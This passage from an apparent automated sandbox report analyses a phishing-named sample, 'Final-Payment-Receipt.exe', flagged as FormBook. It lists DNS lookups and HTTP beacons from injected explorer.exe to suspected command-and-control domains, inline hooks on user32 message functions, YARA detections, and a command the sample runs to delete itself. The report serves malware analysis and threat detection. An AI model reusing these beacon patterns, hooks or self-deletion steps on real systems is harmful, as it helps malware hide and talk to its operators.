                                              Nov 19, 2020 22:20:18.258366108 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:18.300740004 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:26.929465055 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:26.968744040 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:47.608442068 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:47.664834976 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:49.144931078 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:49.172059059 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:21:08.422624111 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:21:08.462667942 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:21:28.816133976 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:21:28.857445955 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5

                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Nov 19, 2020 22:20:17.573630095 CET | 192.168.2.5 | 8.8.8.8 | 0xc1b0 | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:20:26.929465055 CET | 192.168.2.5 | 8.8.8.8 | 0x34c1 | Standard query (0) | www.wacrox.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:20:47.608442068 CET | 192.168.2.5 | 8.8.8.8 | 0x15ec | Standard query (0) | www.trumpingitagain.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:08.422624111 CET | 192.168.2.5 | 8.8.8.8 | 0x4070 | Standard query (0) | www.azarblock.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.816133976 CET | 192.168.2.5 | 8.8.8.8 | 0x82a5 | Standard query (0) | www.themindofafunnygirl.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Nov 19, 2020 22:20:17.624994993 CET | 8.8.8.8 | 192.168.2.5 | 0xc1b0 | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                                              Nov 19, 2020 22:20:26.968744040 CET | 8.8.8.8 | 192.168.2.5 | 0x34c1 | No error (0) | www.wacrox.com | | 162.0.236.49 | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET | 8.8.8.8 | 192.168.2.5 | 0x15ec | No error (0) | www.trumpingitagain.com | trumpingitagain.com | | CNAME (Canonical name) | IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET | 8.8.8.8 | 192.168.2.5 | 0x15ec | No error (0) | trumpingitagain.com | | 27.123.27.33 | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:08.462667942 CET | 8.8.8.8 | 192.168.2.5 | 0x4070 | Name error (3) | www.azarblock.com | none | none | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET | 8.8.8.8 | 192.168.2.5 | 0x82a5 | No error (0) | www.themindofafunnygirl.com | themindofafunnygirl.com | | CNAME (Canonical name) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET | 8.8.8.8 | 192.168.2.5 | 0x82a5 | No error (0) | themindofafunnygirl.com | | 192.0.78.230 | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET | 8.8.8.8 | 192.168.2.5 | 0x82a5 | No error (0) | themindofafunnygirl.com | | 192.0.78.148 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.wacrox.com
                                              • www.trumpingitagain.com
                                              • www.themindofafunnygirl.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.5 | 49730 | 162.0.236.49 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 19, 2020 22:20:27.149298906 CET | 5719 | OUT | GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.wacrox.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:27.391788006 CET | 5720 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 19 Nov 2020 21:20:27 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Content-Length: 327
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.5 | 49731 | 27.123.27.33 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 19, 2020 22:20:47.953753948 CET | 5721 | OUT | GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.trumpingitagain.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:48.246388912 CET | 5721 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:20:48 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.5 | 49733 | 192.0.78.230 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 19, 2020 22:21:28.875543118 CET | 5733 | OUT | GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.themindofafunnygirl.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:21:28.891923904 CET | 5733 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:21:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr
                                              X-ac: 2.hhn
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name | Hook Type | Active in Processes
                                              PeekMessageA | INLINE | explorer.exe
                                              PeekMessageW | INLINE | explorer.exe
                                              GetMessageW | INLINE | explorer.exe
                                              GetMessageA | INLINE | explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function Name | Hook Type | New Data
                                              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
                                              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEE

                                              Statistics

                                              Behavior


                                              System Behavior

                                              General

                                              Start time:22:19:28
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x10000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:22:19:31
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Imagebase:0x8d0000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:22:19:33
                                              Start date:19/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff693d90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:22:19:41
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\wlanext.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wlanext.exe
                                              Imagebase:0xe10000
                                              File size:78848 bytes
                                              MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:22:19:46
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x150000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:22:19:47
                                              Start date:19/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis
